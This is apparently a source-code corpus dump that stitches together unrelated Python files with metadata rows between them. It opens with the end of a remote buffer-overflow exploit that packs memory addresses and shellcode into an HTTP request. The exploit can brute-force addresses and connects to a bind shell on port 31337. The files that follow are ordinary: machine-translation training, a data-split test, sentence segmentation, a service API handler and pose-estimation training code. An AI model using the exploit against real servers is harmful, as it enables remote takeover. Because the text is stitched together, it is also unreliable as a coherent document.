print "[*] -b specifies a brute-force (which will start at ctx_addr"
sys.exit(0)
host = argv[1]
port = int(argv[2])
ctx_addr = int(argv[3],16)
brute_flag = 0
if(argc == 5):
brute_flag = 1
testing = 1
print "[*] target: %s:%d" % (host, port)
try:
sd = urllib.urlopen("http://%s:%d" % (host, port))
sd.close()
except IOError, errmsg:
print "[*] error: %s" % (errmsg)
sys.exit(1)
print "[*] sending exploit string to %s:%d" % (host, port)
while(testing):
CTX_ADDRESS = struct.pack('<L',ctx_addr)
CTX_OUT_ADDRESS = struct.pack('<L', ctx_addr-60)
POOL_ADDRESS = struct.pack('<L',ctx_addr+56)
DATA_ADDRESS = struct.pack('<L',ctx_addr+86)
RANGE_ADDRESS = struct.pack('<L',ctx_addr+124)
SHELL_ADDRESS = struct.pack('<L',ctx_addr+128)
#PADDING
SHELLCODE=PATTERN[:67]
#the output context structure
SHELLCODE+=NULLPTR*9+POOL_ADDRESS+NULLPTR*4+SHELL_ADDRESS
#Magic
SHELLCODE+=CTX_OUT_ADDRESS+CTX_ADDRESS+NULLPTR
#this is the context object - some null ptrs, then we set range, then
#pool address
SHELLCODE+=NULLPTR*3+RANGE_ADDRESS+'\x01\x00\x00\x00'
SHELLCODE+=NULLPTR*2+POOL_ADDRESS
#this is the data buffer object
SHELLCODE+=NULLPTR*4+SHELL_ADDRESS+NULLPTR
#this is the pool memory structure ..
SHELLCODE+=DATA_ADDRESS+NULLPTR+POOL_ADDRESS+NULLPTR*12+NULLPTR
# this is the range structure
SHELLCODE+='\xff\xff\xff\xff'+NULLPTR*3
SHELLCODE+=SHELL
payload = REQUEST_METHOD
payload += BUG
payload += SHELLCODE
payload += ' HTTP/1.0\r\n\r\n'
sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sd.connect((host, port))
sd.send(payload)
sd.close()
if (brute_flag):
nsock = connect_socket(host,31337)
if nsock != 0:
print "[*] Successful Exploit via buffer: %x" % (ctx_addr)
testing = 0
handle_connection(nsock)
else:
ctx_addr = ctx_addr + 1
else:
testing = 0
print "[*] FIN."
if __name__ == "__main__":
main(sys.argv)
sys.exit(0)
# EOF
| 36.133663 | 360 | 0.626113 |
4a225571c986c2773d4f8f6f88b6bc0f58dfe090 | 2,198 | py | Python | kh-kim models/main.py | dudtjakdl/OpenNMT-Korean-To-English | 32fcdb860906f40f84375ec17a23ae32cb90baa0 | [
"Apache-2.0"
] | 11 | 2020-01-27T02:17:07.000Z | 2021-06-29T08:58:08.000Z | kh-kim models/main.py | dudtjakdl/OpenNMT-Korean-To-English | 32fcdb860906f40f84375ec17a23ae32cb90baa0 | [
"Apache-2.0"
] | null | null | null | kh-kim models/main.py | dudtjakdl/OpenNMT-Korean-To-English | 32fcdb860906f40f84375ec17a23ae32cb90baa0 | [
"Apache-2.0"
] | 4 | 2020-02-10T05:32:22.000Z | 2022-02-04T13:14:11.000Z | import torch
import torch.nn as nn
import torch.optim as optim
from simple_nmt.encoder import Encoder
from simple_nmt.decoder import Decoder
from simple_nmt.seq2seq import Seq2Seq
from data_loader import DataLoader
#from train import
from hyperparams import Hyperparams
if __name__ == "__main__":
hparams = Hyperparams()
cuda = hparams.use_cuda and torch.cuda.is_available()
device = torch.device('cuda' if cuda else 'cpu')
enc, enc_hidden = Encoder()
dec, dec_hidden = Decoder()
model = Seq2Seq(enc, dec)
model.flatten_parameters() # 일자로 펴 준다
model = nn.DataParallel(model).to(device)
optimizer = optim.Adam(model.module.parameters(), lr=hparams.lr)
# loss function의 변수로 criterion 대게 씀. reduction은 loss를 어떻게 넘길지인데, default는 mean이지만 sum이 더 빠르다고 함. 더 정확한 것은 mean
# ignore_index는 loss 계산시 무시할 인덱스인데, PADDING 된 것들에는 loss 계산할 필요가 없다.
criterion = nn.CrossEntropyLoss(reduction='sum', ignore_index=PAD_token).to(device)
#########
# 데이터 로딩 & 벡터화
# (input(한글문장) & target(영어문장) 로드, 벡터로까지 만드는 과정 필요. (sentencepiece , 임베딩))
#########
# 데이터 리스트를 변수에 저장. 한-영 의 딕셔너리를 만든다. (문장1. 안녕 : hi)
# train / valid 데이터로 쪼개준다. total_time_step : 한 에폭에 몇 timestep이 도는지.
total_time_step, train_dataset, valid_dataset = split_dataset( # split_dataset은 dataset.py의 함수 이름.
hparams = hparams,
kor_vectors = kor_vectors,
eng_vectors = eng_vectors,
valid_ratio = 0.015
)
for epoch in range(hparams.max_ephochs):
train_loader = TranslationDataset(train_dataset)
train_loader.start() # 배치단위로 나누어서 가져 오기. thread
train_loss, train_bleu = train(model, train_loader, criterion) #한 에폭이 돌아가는 함수 : train 함수. 불러오기
print(train_loss, train_bleu)
train_loader.join() #thread 사용할 경우, 돌아가는 시간이 서로 다르기 때문에 같이 끝나게 해줌.
valid_loader = DataLoader(valid_dataset)
valid_loader.start()
valid_loss, valid_bleu = evaluate(model, valid_loader, criterion)
#train과 달리 evaluate은 gradient를 주지 않는다. 즉 back-prop (X). 단순 포워드, 한 에폭당 얼마나 좋아졌는지 / 오버피팅 나는지 확인 가능
print(valid_loss, valid_bleu)
valid_loader.join()
torch.save(model, "model.pt 경로")
| 36.633333 | 114 | 0.686078 |
4a2256158e0fa6c67b89a68c724977dcd068a741 | 1,921 | py | Python | pyzoo/test/zoo/zouwu/preprocessing/test_util.py | GZHoffie/analytics-zoo | d0258aa113ffd1a5c4927376fb32b09fb0baf73c | [
"Apache-2.0"
] | 4 | 2018-06-19T05:38:30.000Z | 2020-06-22T14:26:26.000Z | pyzoo/test/zoo/zouwu/preprocessing/test_util.py | GZHoffie/analytics-zoo | d0258aa113ffd1a5c4927376fb32b09fb0baf73c | [
"Apache-2.0"
] | 5 | 2021-06-08T23:28:18.000Z | 2022-02-10T05:31:27.000Z | pyzoo/test/zoo/zouwu/preprocessing/test_util.py | GZHoffie/analytics-zoo | d0258aa113ffd1a5c4927376fb32b09fb0baf73c | [
"Apache-2.0"
] | 1 | 2018-09-05T02:16:10.000Z | 2018-09-05T02:16:10.000Z | #
# Copyright 2018 Analytics Zoo Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from test.zoo.pipeline.utils.test_utils import ZooTestCase
from zoo.automl.common.util import *
from zoo.zouwu.preprocessing.utils import train_val_test_split
import pandas as pd
class TestUtil(ZooTestCase):
def setup_method(self, method):
pass
def teardown_method(self, method):
pass
def test_train_val_test_split(self):
# length test
sample_num = 100
look_back = 10
horizon = 1
dates = pd.date_range('1/1/2020', periods=sample_num)
values = np.random.randn(sample_num)
df = pd.DataFrame({"values": values}, index=dates)
train_df, val_df, test_df = train_val_test_split(df,
val_ratio=0.1,
test_ratio=0.1,
look_back=look_back,
horizon=horizon)
assert len(train_df) == sample_num * 0.8
assert len(val_df) == sample_num * 0.1 + look_back + horizon - 1
assert len(test_df) == sample_num * 0.1 + look_back + horizon - 1
# index test
assert pd.api.types.is_datetime64_any_dtype(test_df.index.dtype)
assert pd.api.types.is_datetime64_any_dtype(val_df.index.dtype)
| 39.204082 | 77 | 0.624154 |
4a2257367ccec7fb16591c5c83cf03d4bbfec444 | 3,183 | py | Python | simple_sentence_segment/model.py | OmarSayedMostafa/clinical_concept_extraction | 495581e2e8ec034c2a5ab985779cc4750a797875 | [
"MIT"
] | null | null | null | simple_sentence_segment/model.py | OmarSayedMostafa/clinical_concept_extraction | 495581e2e8ec034c2a5ab985779cc4750a797875 | [
"MIT"
] | null | null | null | simple_sentence_segment/model.py | OmarSayedMostafa/clinical_concept_extraction | 495581e2e8ec034c2a5ab985779cc4750a797875 | [
"MIT"
] | null | null | null | from six.moves import range
from six.moves import cPickle
import six
import os
import re
import numpy as np
dir_path = os.path.dirname(os.path.realpath(__file__))
if six.PY3:
cls = cPickle.load(open(os.path.join(dir_path, 'model/cls.pkl'), 'rb'), encoding='latin1')
elif six.PY2:
cls = cPickle.load(open(os.path.join(dir_path, 'model/cls.pkl'), 'rb'))
else:
raise RuntimeError
char_list = ['x', 'X', 'S', '8', '\n', '.', ':', '-', '*',
')', '?', '(', ',', '/', '#', '%', '\t', '+',
';', '=', '>', "'", '"', '&', ']', '<']
char2id = {item: item_id for item_id, item in enumerate(char_list)}
DEFAULT_EXCLUSIVE = ['M.D.', 'Dr.', 'vs.']
def get_possible_eos(text, exclusive_phrase):
possible_eos_re = [' [A-Z]', '\.', '\?', '\n', '\t', '\)',
'\]', '\}', '\*', '"', ':']
eos_re = re.compile('|'.join(possible_eos_re))
eos = set()
for eos_find in eos_re.finditer(text):
start_id = eos_find.span()[0]
exclusive = False
for phrase in exclusive_phrase:
if text[start_id - len(phrase) + 1: start_id + 1] == phrase:
exclusive = True
break
if not exclusive:
eos.update([start_id])
eos = list(eos)
eos.sort()
return eos
def get_context_char(text, char_id, window=5):
max_len = len(text)
assert 0 <= char_id < max_len
left_text = []
for i in range(window):
if char_id - i - 1 < 0:
left_text.insert(0, ' ')
else:
left_text.insert(0, text[char_id - i - 1])
right_text = []
for i in range(window):
if char_id + 1 + i >= max_len:
right_text.append(' ')
else:
right_text.append(text[char_id + 1 + i])
return left_text + [text[char_id]] + right_text
def one_hot_encoder(X):
final_output = []
for i in range(11):
targets = np.array(X[:, i]).reshape(-1)
final_output.append(np.eye(27)[targets])
final_output = np.concatenate(final_output, axis=-1)
return final_output
def encode_char(c):
if c.isalpha():
if c.islower():
normalized_char = 'x'
else:
normalized_char = 'X'
elif c.isdigit():
normalized_char = '8'
elif c == ' ':
normalized_char = 'S'
else:
normalized_char = c
if normalized_char in char_list:
return char2id[normalized_char]
else:
return 26
def get_span(eos_list, text):
eos_list = [item + 1 for item in eos_list]
eos_list.sort()
eos_list.insert(0, 0)
if len(text) not in eos_list:
eos_list.append(len(text))
spans = []
for i in range(len(eos_list) - 1):
s, t = eos_list[i], eos_list[i + 1]
if len(text[s:t].strip()) > 0:
spans.append((s, t))
return spans
def sentence_segment(text, exclusive_phrase=None):
if exclusive_phrase is None:
exclusive_phrase = DEFAULT_EXCLUSIVE
eos_id_list = get_possible_eos(text, exclusive_phrase)
X = []
for char_id in eos_id_list:
features = []
for c in get_context_char(text, char_id):
features.append(encode_char(c))
X.append(features)
X = np.array(X, dtype=int)
X = one_hot_encoder(X)
y = cls.predict(X)
valid_eos = [x_ for x_, y_ in zip(eos_id_list, y) if y_ == 1]
all_span = get_span(valid_eos, text)
return all_span
| 23.753731 | 92 | 0.606346 |
4a2257d565e2e8986a305018096faf5375d183b2 | 3,381 | py | Python | lightedge/managers/servicemanager/servicehandler.py | davitharutyunyan1990/lightedge-runtime | 8e5a1a2c507afe46bf8ef0e1731db16440af374a | [
"Apache-2.0"
] | null | null | null | lightedge/managers/servicemanager/servicehandler.py | davitharutyunyan1990/lightedge-runtime | 8e5a1a2c507afe46bf8ef0e1731db16440af374a | [
"Apache-2.0"
] | null | null | null | lightedge/managers/servicemanager/servicehandler.py | davitharutyunyan1990/lightedge-runtime | 8e5a1a2c507afe46bf8ef0e1731db16440af374a | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
#
# Copyright (c) 2020 Giovanni Baggio
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Service handler."""
import empower_core.apimanager.apimanager as apimanager
# pylint: disable=W0223
class ServiceHandler(apimanager.APIHandler):
"""Handle services."""
URLS = [r"/api/v1/servicemanager/?",
r"/api/v1/servicemanager/([a-zA-Z0-9-]*)/?"]
@apimanager.validate(min_args=0, max_args=1)
def get(self, service_name=None):
"""List entries in the Match Map.
Args:
[0]: the service name
Example URLs:
GET /api/v1/servicemanager
[
{
"name": "service1",
"description": "description of service1",
"url": "http://localhost:8000/double_endpoint",
"timeout": 3000,
"expected_code": 200
},
{
"name": "service2",
"description": "description of service2",
"url": "http://localhost:8000/content_endpoint",
"timeout": 3000,
"expected_code": 200
}
]
GET /api/v1/servicemanager/service1
{
"name": "service1",
"description": "description of service1",
"url": "http://localhost:8000/double_endpoint",
"timeout": 3000,
"expected_code": 200
}
"""
return self.service.get_services(service_name)
@apimanager.validate(returncode=201, min_args=0, max_args=0)
def post(self, **kwargs):
"""Add a new service.
Example URLs:
POST /api/v1/servicemanager
{
"name": "service1",
"description": "description of service1",
"url": "http://localhost:8000/double_endpoint",
"timeout": 3000
}
"""
return self.service.add_service(kwargs)
@apimanager.validate(returncode=204, min_args=1, max_args=1)
def put(self, service_name, **kwargs):
"""Update a service.
Args:
[0]: the service name
Example URLs:
PUT /api/v1/servicemanager/service1
{
"name": "service1",
"description": "description of service1",
"url": "http://localhost:1234"
}
"""
return self.service.update_service(service_name, kwargs)
@apimanager.validate(returncode=204, min_args=1, max_args=1)
def delete(self, service_name):
"""Delete a service.
Args:
[0]: the service name
Example URLs:
DELETE /api/v1/servicemanager/service1
"""
self.service.delete_service(service_name)
| 31.896226 | 68 | 0.55102 |
4a225815208b7b5241a3aa2f60c6a689126c7177 | 25,909 | py | Python | lib/tfflat/.ipynb_checkpoints/base_multi_gpu-checkpoint.py | Ascend-Huawei/PoseFix | 9b287934879beadc71daa3a642cbbb4a0feb1db5 | [
"Apache-2.0"
] | null | null | null | lib/tfflat/.ipynb_checkpoints/base_multi_gpu-checkpoint.py | Ascend-Huawei/PoseFix | 9b287934879beadc71daa3a642cbbb4a0feb1db5 | [
"Apache-2.0"
] | null | null | null | lib/tfflat/.ipynb_checkpoints/base_multi_gpu-checkpoint.py | Ascend-Huawei/PoseFix | 9b287934879beadc71daa3a642cbbb4a0feb1db5 | [
"Apache-2.0"
] | 1 | 2021-08-19T09:51:25.000Z | 2021-08-19T09:51:25.000Z | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from npu_bridge.npu_init import *
import tensorflow as tf
import tensorflow.contrib.slim as slim
import numpy as np
from collections import OrderedDict as dict
import setproctitle
import os
import os.path as osp
import glob
import json
import math
import abc
from .net_utils import average_gradients, aggregate_batch, get_optimizer, get_tower_summary_dict
from .saver import load_model, Saver
from .timer import Timer
from .logger import colorlogger
from .utils import approx_equal
class ModelDesc(object):
__metaclass__ = abc.ABCMeta
def __init__(self):
self._loss = None
self._inputs = []
self._outputs = []
self._tower_summary = []
def set_inputs(self, *vars):
self._inputs = vars
def set_outputs(self, *vars):
self._outputs = vars
def set_loss(self, var):
if not isinstance(var, tf.Tensor):
raise ValueError("Loss must be an single tensor.")
# assert var.get_shape() == [], 'Loss tensor must be a scalar shape but got {} shape'.format(var.get_shape())
self._loss = var
def get_loss(self, include_wd=False):
if self._loss is None:
raise ValueError("Network doesn't define the final loss")
if include_wd:
weight_decay = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)
weight_decay = tf.add_n(weight_decay)
return self._loss + weight_decay
else:
return self._loss
def get_inputs(self):
if len(self._inputs) == 0:
raise ValueError("Network doesn't define the inputs")
return self._inputs
def get_outputs(self):
if len(self._outputs) == 0:
raise ValueError("Network doesn't define the outputs")
return self._outputs
def add_tower_summary(self, name, vars, reduced_method='mean'):
assert reduced_method == 'mean' or reduced_method == 'sum', \
"Summary tensor only supports sum- or mean- reduced method"
if isinstance(vars, list):
for v in vars:
if vars.get_shape() == None:
print('Summary tensor {} got an unknown shape.'.format(name))
else:
assert v.get_shape().as_list() == [], \
"Summary tensor only supports scalar but got {}".format(v.get_shape().as_list())
tf.add_to_collection(name, v)
else:
if vars.get_shape() == None:
print('Summary tensor {} got an unknown shape.'.format(name))
else:
assert vars.get_shape().as_list() == [], \
"Summary tensor only supports scalar but got {}".format(vars.get_shape().as_list())
tf.add_to_collection(name, vars)
self._tower_summary.append([name, reduced_method])
@abc.abstractmethod
def make_network(self, is_train):
pass
class Base(object):
__metaclass__ = abc.ABCMeta
"""
build graph:
_make_graph
make_inputs
make_network
add_tower_summary
get_summary
train/test
"""
def __init__(self, net, cfg, data_iter=None, log_name='logs.txt'):
self._input_list = []
self._output_list = []
self._outputs = []
self.graph_ops = None
self.net = net
self.cfg = cfg
self.cur_epoch = 0
self.summary_dict = {}
# timer
self.tot_timer = Timer()
self.gpu_timer = Timer()
self.read_timer = Timer()
# logger
self.logger = colorlogger(cfg.log_dir, log_name=log_name)
# initialize tensorflow and npu
config = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False)
config.gpu_options.allow_growth = True
custom_op = config.graph_options.rewrite_options.custom_optimizers.add()
custom_op.name = "NpuOptimizer"
config.graph_options.rewrite_options.remapping = RewriterConfig.OFF
self.init_sess = tf.Session(config=config)
self.init_sess.run(npu_ops.initialize_system())
config.gpu_options.visible_device_list = str(get_local_rank_id()) # "hvd.local_rank"修改为"get_local_rank_id"
self.sess = tf.Session(config=npu_config_proto(config_proto=config))
# build_graph
self.build_graph()
# get data iter
self._data_iter = data_iter
@abc.abstractmethod
def _make_data(self):
return
@abc.abstractmethod
def _make_graph(self):
return
def build_graph(self):
# all variables should be in the same graph and stored in cpu.
with tf.device('/cpu:0'):
tf.set_random_seed(2333)
self.graph_ops = self._make_graph()
if not isinstance(self.graph_ops, list) and not isinstance(self.graph_ops, tuple):
self.graph_ops = [self.graph_ops]
self.summary_dict.update( get_tower_summary_dict(self.net._tower_summary) )
def load_weights(self, model=None):
load_ImageNet = True
if model == 'last_epoch':
sfiles = os.path.join(self.cfg.model_dump_dir, 'snapshot_*.ckpt.meta')
sfiles = glob.glob(sfiles)
if len(sfiles) > 0:
sfiles.sort(key=os.path.getmtime)
sfiles = [i[:-5] for i in sfiles if i.endswith('.meta')]
model = sfiles[-1]
else:
self.logger.critical('No snapshot model exists.')
return
load_ImageNet = False
if isinstance(model, int):
model = os.path.join(self.cfg.model_dump_dir, 'snapshot_%d.ckpt' % model)
load_ImageNet = False
if isinstance(model, str) and (osp.exists(model + '.meta') or osp.exists(model)):
self.logger.info('Initialized model weights from {} ...'.format(model))
load_model(self.sess, model, load_ImageNet)
if model.split('/')[-1].startswith('snapshot_'):
self.cur_epoch = int(model[model.find('snapshot_')+9:model.find('.ckpt')])
self.logger.info('Current epoch is %d.' % self.cur_epoch)
else:
self.logger.critical('Load nothing. There is no model in path {}.'.format(model))
def next_feed(self):
if self._data_iter is None:
raise ValueError('No input data.')
feed_dict = dict()
for inputs in self._input_list:
blobs = next(self._data_iter)
for i, inp in enumerate(inputs):
inp_shape = inp.get_shape().as_list()
if None in inp_shape:
feed_dict[inp] = blobs[i]
else:
feed_dict[inp] = blobs[i].reshape(*inp_shape)
return feed_dict
class Trainer(Base):
def __init__(self, net, cfg, data_iter=None):
self.lr_eval = cfg.lr
self.lr = tf.Variable(cfg.lr, trainable=False)
self._optimizer = get_optimizer(self.lr, cfg.optimizer)
super(Trainer, self).__init__(net, cfg, data_iter, log_name='train_logs.txt')
# make data
self._data_iter, self.itr_per_epoch = self._make_data()
def compute_iou(self, src_roi, dst_roi):
# IoU calculate with GTs
xmin = np.maximum(dst_roi[:,0], src_roi[:,0])
ymin = np.maximum(dst_roi[:,1], src_roi[:,1])
xmax = np.minimum(dst_roi[:,0]+dst_roi[:,2], src_roi[:,0]+src_roi[:,2])
ymax = np.minimum(dst_roi[:,1]+dst_roi[:,3], src_roi[:,1]+src_roi[:,3])
interArea = np.maximum(0, xmax - xmin) * np.maximum(0, ymax - ymin)
boxAArea = dst_roi[:,2] * dst_roi[:,3]
boxBArea = np.tile(src_roi[:,2] * src_roi[:,3],(len(dst_roi),1))
sumArea = boxAArea + boxBArea
iou = interArea / (sumArea - interArea + 1e-5)
return iou
def _make_data(self):
from dataset import Dataset
from gen_batch import generate_batch
d = Dataset()
train_data = d.load_train_data()
## modify train_data to the result of the decoupled initial model
with open(d.test_on_trainset_path, 'r') as f:
test_on_trainset = json.load(f)
# sort list by img_id
train_data = sorted(train_data, key=lambda k: k['image_id'])
test_on_trainset = sorted(test_on_trainset, key=lambda k: k['image_id'])
# cluster train_data and test_on_trainset by img_id
cur_img_id = train_data[0]['image_id']
data_gt = []
data_gt_per_img = []
for i in range(len(train_data)):
if train_data[i]['image_id'] == cur_img_id:
data_gt_per_img.append(train_data[i])
else:
data_gt.append(data_gt_per_img)
cur_img_id = train_data[i]['image_id']
data_gt_per_img = [train_data[i]]
if len(data_gt_per_img) > 0:
data_gt.append(data_gt_per_img)
cur_img_id = test_on_trainset[0]['image_id']
data_out = []
data_out_per_img = []
for i in range(len(test_on_trainset)):
if test_on_trainset[i]['image_id'] == cur_img_id:
data_out_per_img.append(test_on_trainset[i])
else:
data_out.append(data_out_per_img)
cur_img_id = test_on_trainset[i]['image_id']
data_out_per_img = [test_on_trainset[i]]
if len(data_out_per_img) > 0:
data_out.append(data_out_per_img)
# remove false positive images
i = 0
j = 0
aligned_data_out = []
while True:
gt_img_id = data_gt[i][0]['image_id']
out_img_id = data_out[j][0]['image_id']
if gt_img_id > out_img_id:
j = j + 1
elif gt_img_id < out_img_id:
i = i + 1
else:
aligned_data_out.append(data_out[j])
i = i + 1
j = j + 1
if j == len(data_out) or i == len(data_gt):
break
data_out = aligned_data_out
# add false negative images
j = 0
aligned_data_out = []
for i in range(len(data_gt)):
gt_img_id = data_gt[i][0]['image_id']
out_img_id = data_out[j][0]['image_id']
if gt_img_id == out_img_id:
aligned_data_out.append(data_out[j])
j = j + 1
else:
aligned_data_out.append([])
if j == len(data_out):
break
data_out = aligned_data_out
# they should contain annotations from all the images
assert len(data_gt) == len(data_out)
# for each img
for i in range(len(data_gt)):
bbox_out_per_img = np.zeros((len(data_out[i]),4))
joint_out_per_img = np.zeros((len(data_out[i]),self.cfg.num_kps*3))
assert len(data_gt[i]) == len(data_out[i])
# for each data_out in an img
for j in range(len(data_out[i])):
bbox = data_out[i][j]['bbox'] #x, y, width, height
joint = data_out[i][j]['keypoints']
bbox_out_per_img[j,:] = bbox
joint_out_per_img[j,:] = joint
# for each gt in an img
for j in range(len(data_gt[i])):
bbox_gt = np.array(data_gt[i][j]['bbox']) #x, y, width, height
joint_gt = np.array(data_gt[i][j]['joints'])
# IoU calculate with detection outputs of other methods
iou = self.compute_iou(bbox_gt.reshape(1,4), bbox_out_per_img)
out_idx = np.argmax(iou)
data_gt[i][j]['estimated_joints'] = [joint_out_per_img[out_idx,:]]
# for swap
num_overlap = 0
near_joints = []
for k in range(len(data_gt[i])):
bbox_gt_k = np.array(data_gt[i][k]['bbox'])
iou_with_gt_k = self.compute_iou(bbox_gt.reshape(1,4), bbox_gt_k.reshape(1,4))
if k == j or iou_with_gt_k < 0.1:
continue
num_overlap += 1
near_joints.append(np.array(data_gt[i][k]['joints']).reshape(self.cfg.num_kps,3))
data_gt[i][j]['overlap'] = num_overlap
if num_overlap > 0:
data_gt[i][j]['near_joints'] = near_joints
else:
data_gt[i][j]['near_joints'] = [np.zeros([self.cfg.num_kps,3])]
# flatten data_gt
train_data = [y for x in data_gt for y in x]
from tfflat.data_provider import DataFromList, MultiProcessMapDataZMQ, BatchData, MapData
data_load_thread = DataFromList(train_data)
if self.cfg.multi_thread_enable:
data_load_thread = MultiProcessMapDataZMQ(data_load_thread, self.cfg.num_thread, generate_batch, strict=True)
else:
data_load_thread = MapData(data_load_thread, generate_batch)
data_load_thread = BatchData(data_load_thread, self.cfg.batch_size)
data_load_thread.reset_state()
dataiter = data_load_thread.get_data()
return dataiter, math.ceil(len(train_data)/self.cfg.batch_size/self.cfg.num_gpus)
def _make_graph(self):
self.logger.info("Generating training graph on {} GPUs ...".format(self.cfg.num_gpus))
weights_initializer = slim.xavier_initializer()
biases_initializer = tf.constant_initializer(0.)
biases_regularizer = tf.no_regularizer
weights_regularizer = tf.contrib.layers.l2_regularizer(self.cfg.weight_decay)
# npu version
with tf.variable_scope(tf.get_variable_scope()):
with slim.arg_scope([slim.conv2d, slim.conv2d_in_plane, \
slim.conv2d_transpose, slim.separable_conv2d,
slim.fully_connected],
weights_regularizer=weights_regularizer,
biases_regularizer=biases_regularizer,
weights_initializer=weights_initializer,
biases_initializer=biases_initializer):
self.net.make_network(is_train=True)
loss = self.net.get_loss(include_wd=True)
self._input_list.append( self.net.get_inputs() )
extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(extra_update_ops):
train_op = self._optimizer.optimize(loss)
return train_op
# tower_grads = []
# with tf.variable_scope(tf.get_variable_scope()):
# for i in range(self.cfg.num_gpus):
# with tf.device('/cpu:0'):
# with tf.name_scope('tower_%d' % i) as name_scope:
# # Force all Variables to reside on the CPU.
# with slim.arg_scope([slim.model_variable, slim.variable], device='/device:CPU:0'):
# with slim.arg_scope([slim.conv2d, slim.conv2d_in_plane, \
# slim.conv2d_transpose, slim.separable_conv2d,
# slim.fully_connected],
# weights_regularizer=weights_regularizer,
# biases_regularizer=biases_regularizer,
# weights_initializer=weights_initializer,
# biases_initializer=biases_initializer):
# # loss over single GPU
# self.net.make_network(is_train=True)
# if i == self.cfg.num_gpus - 1:
# loss = self.net.get_loss(include_wd=True)
# else:
# loss = self.net.get_loss()
# self._input_list.append( self.net.get_inputs() )
# tf.get_variable_scope().reuse_variables()
# if i == 0:
# if self.cfg.num_gpus > 1 and self.cfg.bn_train is True:
# self.logger.warning("BN is calculated only on single GPU.")
# extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS, name_scope)
# with tf.control_dependencies(extra_update_ops):
# grads = self._optimizer.compute_gradients(loss)
# else:
# grads = self._optimizer.compute_gradients(loss)
# final_grads = []
# with tf.variable_scope('Gradient_Mult') as scope:
# for grad, var in grads:
# final_grads.append((grad, var))
# tower_grads.append(final_grads)
# if len(tower_grads) > 1:
# grads = average_gradients(tower_grads)
# else:
# grads = tower_grads[0]
# apply_gradient_op = self._optimizer.apply_gradients(grads)
# train_op = tf.group(apply_gradient_op, *extra_update_ops)
return train_op
def train(self):
# saver
self.logger.info('Initialize saver ...')
train_saver = Saver(self.sess, tf.global_variables(), self.cfg.model_dump_dir)
# initialize weights
self.logger.info('Initialize all variables ...')
self.sess.run(tf.variables_initializer(tf.global_variables(), name='init'))
self.load_weights('last_epoch' if self.cfg.continue_train else self.cfg.init_model)
self.logger.info('Start training ...')
start_itr = self.cur_epoch * self.itr_per_epoch + 1
end_itr = self.itr_per_epoch * self.cfg.end_epoch + 1
# 在session run模式下调用集合通信接口broadcast进行变量广播:
input = tf.trainable_variables()
bcast_global_variables_op = hccl_ops.broadcast(input, 0)
for itr in range(start_itr, end_itr):
self.tot_timer.tic()
self.cur_epoch = itr // self.itr_per_epoch
setproctitle.setproctitle('train epoch:' + str(self.cur_epoch))
# apply current learning policy
cur_lr = self.cfg.get_lr(self.cur_epoch)
if not approx_equal(cur_lr, self.lr_eval):
print(self.lr_eval, cur_lr)
self.sess.run(tf.assign(self.lr, cur_lr))
# input data
self.read_timer.tic()
feed_dict = self.next_feed()
self.read_timer.toc()
# train one step
self.gpu_timer.tic()
_, self.lr_eval, *summary_res = self.sess.run(
[self.graph_ops[0], self.lr, *self.summary_dict.values()], feed_dict=feed_dict)
self.gpu_timer.toc()
itr_summary = dict()
for i, k in enumerate(self.summary_dict.keys()):
itr_summary[k] = summary_res[i]
screen = [
'Epoch %d itr %d/%d:' % (self.cur_epoch, itr, self.itr_per_epoch),
'lr: %g' % (self.lr_eval),
'speed: %.2f(%.2fs r%.2f)s/itr' % (
self.tot_timer.average_time, self.gpu_timer.average_time, self.read_timer.average_time),
'%.2fh/epoch' % (self.tot_timer.average_time / 3600. * self.itr_per_epoch),
' '.join(map(lambda x: '%s: %.4f' % (x[0], x[1]), itr_summary.items())),
]
#TODO(display stall?)
if itr % self.cfg.display == 0:
self.logger.info(' '.join(screen))
if itr % self.itr_per_epoch == 0 and get_rank_id() == 0:
train_saver.save_model(self.cur_epoch)
self.tot_timer.toc()
self.init_sess.run(npu_ops.shutdown_system())
self.init_sess.close()
class Tester(Base):
def __init__(self, net, cfg, data_iter=None):
super(Tester, self).__init__(net, cfg, data_iter, log_name='test_logs.txt')
def next_feed(self, batch_data=None):
if self._data_iter is None and batch_data is None:
raise ValueError('No input data.')
feed_dict = dict()
if batch_data is None:
for inputs in self._input_list:
blobs = next(self._data_iter)
for i, inp in enumerate(inputs):
inp_shape = inp.get_shape().as_list()
if None in inp_shape:
feed_dict[inp] = blobs[i]
else:
feed_dict[inp] = blobs[i].reshape(*inp_shape)
else:
assert isinstance(batch_data, list) or isinstance(batch_data, tuple), "Input data should be list-type."
